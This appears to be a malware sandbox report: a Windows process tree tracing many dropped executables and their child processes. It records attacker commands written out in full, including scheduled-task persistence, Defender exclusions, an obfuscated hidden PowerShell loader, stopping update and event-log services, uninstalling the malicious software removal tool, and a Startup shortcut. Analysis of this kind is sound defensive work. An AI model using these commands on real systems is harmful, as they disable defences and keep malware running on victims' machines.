- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1072
    3⤵
    - Program crash
    PID:4784
- C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe
  "C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe"
  2⤵
  - Executes dropped EXE
  PID:1196
- C:\Users\Admin\Desktop\a\pic15.exe
  "C:\Users\Admin\Desktop\a\pic15.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:208
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:4588
- C:\Users\Admin\Desktop\a\limba.exe
  "C:\Users\Admin\Desktop\a\limba.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:4984
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7028
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4328
- C:\Users\Admin\Desktop\a\ChatLife.exe
  "C:\Users\Admin\Desktop\a\ChatLife.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5316
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
    3⤵
    PID:5620
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3528
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:5288
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:4964
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:5556
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 768318
      4⤵
      PID:2028
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "PhoneAbcSchedulesApr" Nbc
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
      4⤵
      PID:6596
  - - C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
      768318\Paraguay.pif 768318\B
      4⤵
      PID:5544
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit
        5⤵
        
        PID:6816
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:3244
- C:\Users\Admin\Desktop\a\1.exe
  "C:\Users\Admin\Desktop\a\1.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:1408
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 352
    3⤵
    - Program crash
    PID:864
- C:\Users\Admin\Desktop\a\gui.exe
  "C:\Users\Admin\Desktop\a\gui.exe"
  2⤵
  - Executes dropped EXE
  PID:3080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3560

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6316
- C:\Users\Admin\Desktop\Files\DRIVEapplet.exe
  "C:\Users\Admin\Desktop\Files\DRIVEapplet.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:3936
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6904
- C:\Users\Admin\Desktop\Files\gold.exe
  "C:\Users\Admin\Desktop\Files\gold.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4820
- C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe
  "C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5256
- C:\Users\Admin\Desktop\Files\look.exe
  "C:\Users\Admin\Desktop\Files\look.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5476
- - C:\Users\Admin\Desktop\Files\look.exe
    "C:\Users\Admin\Desktop\Files\look.exe"
    3⤵
    - Executes dropped EXE
    PID:6548
- C:\Users\Admin\Desktop\Files\cleaner.exe
  "C:\Users\Admin\Desktop\Files\cleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2208
- - C:\Users\Admin\AppData\Roaming\ccleanerfile.exe
    "C:\Users\Admin\AppData\Roaming\ccleanerfile.exe"
    3⤵
    - Executes dropped EXE
    PID:2052
- - C:\Users\Admin\AppData\Roaming\XClient.exe
    "C:\Users\Admin\AppData\Roaming\XClient.exe"
    3⤵
    - Executes dropped EXE
    PID:5908
- C:\Users\Admin\Desktop\Files\AAQ.exe
  "C:\Users\Admin\Desktop\Files\AAQ.exe"
  2⤵
  PID:2764
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Users\Admin\Desktop\Files\AAQ.exe"
    3⤵
    PID:6300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 812
      4⤵
      Program crash
      PID:4048
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 856
      4⤵
      Program crash
      PID:4612
- C:\Users\Admin\Desktop\Files\ghjk.exe
  "C:\Users\Admin\Desktop\Files\ghjk.exe"
  2⤵
  PID:6216
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 912
    3⤵
    - Program crash
    PID:3400
- C:\Users\Admin\Desktop\Files\luma22222.exe
  "C:\Users\Admin\Desktop\Files\luma22222.exe"
  2⤵
  PID:4968
- C:\Users\Admin\Desktop\Files\Zinker.exe
  "C:\Users\Admin\Desktop\Files\Zinker.exe"
  2⤵
  PID:4276
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6984
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3500
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1408
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3860
- C:\Users\Admin\Desktop\Files\time2time.exe
  "C:\Users\Admin\Desktop\Files\time2time.exe"
  2⤵
  PID:5472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\time2time.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
    3⤵
    PID:7136
- C:\Users\Admin\Desktop\Files\nine.exe
  "C:\Users\Admin\Desktop\Files\nine.exe"
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "nine.exe" /f & erase "C:\Users\Admin\Desktop\Files\nine.exe" & exit
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1624
    3⤵
    - Program crash
    PID:2328
- C:\Users\Admin\Desktop\Files\cp.exe
  "C:\Users\Admin\Desktop\Files\cp.exe"
  2⤵
  PID:7052
- C:\Users\Admin\Desktop\Files\cctv2xiaobao.exe
  "C:\Users\Admin\Desktop\Files\cctv2xiaobao.exe"
  2⤵
  PID:1032
- C:\Users\Admin\Desktop\Files\asdfg.exe
  "C:\Users\Admin\Desktop\Files\asdfg.exe"
  2⤵
  PID:6784
- - C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe
    "C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"
    3⤵
    PID:2616
  - - C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe
      "C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"
      4⤵
      PID:764
- - C:\Users\Admin\Desktop\Files\asdfg.exe
    "C:\Users\Admin\Desktop\Files\asdfg.exe"
    3⤵
    PID:4580
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 888
      4⤵
      Program crash
      PID:4376
- C:\Users\Admin\Desktop\Files\Unusoke_LetThereBeNightingale.exe
  "C:\Users\Admin\Desktop\Files\Unusoke_LetThereBeNightingale.exe"
  2⤵
  PID:5160
- C:\Users\Admin\Desktop\Files\vpn-1002.exe
  "C:\Users\Admin\Desktop\Files\vpn-1002.exe"
  2⤵
  PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu7274.tmp\abc.bat"
    3⤵
    PID:7832
- C:\Users\Admin\Desktop\Files\redline123123.exe
  "C:\Users\Admin\Desktop\Files\redline123123.exe"
  2⤵
  PID:7600
- C:\Users\Admin\Desktop\Files\pt.exe
  "C:\Users\Admin\Desktop\Files\pt.exe"
  2⤵
  PID:6020
- - C:\Windows\system32\cmd.exe
    "cmd" /C tasklist
    3⤵
    PID:5452
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7776
- C:\Users\Admin\Desktop\Files\output.exe
  "C:\Users\Admin\Desktop\Files\output.exe"
  2⤵
  PID:3356
- C:\Users\Admin\Desktop\Files\services64.exe
  "C:\Users\Admin\Desktop\Files\services64.exe"
  2⤵
  PID:6224
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2468
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:7124
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    PID:1612
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6364
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7180
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4284
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:4400
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:5640
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:8108
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:6748
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2208
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:6672
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:6084
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WindowsAutHost"
    3⤵
    PID:6788
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
    3⤵
    PID:7676
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:8052
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WindowsAutHost"
    3⤵
    - Launches sc.exe
    PID:8172
- C:\Users\Admin\Desktop\Files\hellminer.exe
  "C:\Users\Admin\Desktop\Files\hellminer.exe"
  2⤵
  PID:4884
- - C:\Users\Admin\Desktop\Files\hellminer.exe
    "C:\Users\Admin\Desktop\Files\hellminer.exe"
    3⤵
    PID:7288
- C:\Users\Admin\Desktop\Files\npp.exe
  "C:\Users\Admin\Desktop\Files\npp.exe"
  2⤵
  PID:1712
- - C:\Users\Admin\AppData\Local\Temp\1796026790.exe
    C:\Users\Admin\AppData\Local\Temp\1796026790.exe
    3⤵
    PID:4928
  - - C:\Windows\sysmablsvr.exe
      C:\Windows\sysmablsvr.exe
      4⤵
      PID:4216
    - - C:\Users\Admin\AppData\Local\Temp\243032482.exe
        
        C:\Users\Admin\AppData\Local\Temp\243032482.exe
        5⤵
        
        PID:6884
- C:\Users\Admin\Desktop\Files\drivermanager.exe
  "C:\Users\Admin\Desktop\Files\drivermanager.exe"
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 984
    3⤵
    - Program crash
    PID:4640
- C:\Users\Admin\Desktop\Files\11.exe
  "C:\Users\Admin\Desktop\Files\11.exe"
  2⤵
  PID:7580
- C:\Users\Admin\Desktop\Files\cluton.exe
  "C:\Users\Admin\Desktop\Files\cluton.exe"
  2⤵
  PID:6780
- C:\Users\Admin\Desktop\Files\motruhjgmawes.exe
  "C:\Users\Admin\Desktop\Files\motruhjgmawes.exe"
  2⤵
  PID:1232

C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5888
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5856
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5840
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5852
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2116
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5976

C:\ProgramData\agmxykvocxft\etuamactyjne.exe
C:\ProgramData\agmxykvocxft\etuamactyjne.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2364
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5612
- - C:\ProgramData\agmxykvocxft\etuamactyjne.exe
    "C:\ProgramData\agmxykvocxft\etuamactyjne.exe"
    3⤵
    PID:4916
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:7588
- - C:\ProgramData\agmxykvocxft\etuamactyjne.exe
    "C:\ProgramData\agmxykvocxft\etuamactyjne.exe"
    3⤵
    PID:3524
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:4392
- - C:\ProgramData\agmxykvocxft\etuamactyjne.exe
    "C:\ProgramData\agmxykvocxft\etuamactyjne.exe"
    3⤵
    PID:7576
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:620
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3432

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1008
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  PID:2436

C:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exe
C:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5780
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5864

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:6232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6840 -ip 6840
1⤵
PID:2576

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
- Executes dropped EXE
PID:5632
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Checks processor information in registry
  PID:1824
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 1584
    3⤵
    - Program crash
    PID:8104
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  - Executes dropped EXE
  PID:4904
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 552
    3⤵
    - Program crash
    PID:2640
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 568
  2⤵
  - Program crash
  PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3188 -ip 3188
1⤵
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5632 -ip 5632
1⤵
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4904 -ip 4904
1⤵
PID:872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1408 -ip 1408
1⤵
PID:6344

C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:6760
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4088
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:6900
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2996

C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe
C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1708
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5340
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5904
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    PID:6856
- - C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe
    "C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe"
    3⤵
    PID:6220
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4088
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5892
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:6324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6348
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:2292

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:6524
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4964
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:6816
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5840
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:2992
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  PID:1948
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  PID:5868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3732
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1216
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5156
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:6676
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6904
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6540
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:4276
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5396
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5172
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1000
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4472
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:812
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:5552
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:6576
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:1980
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:6912
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3328
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1720
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:6356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
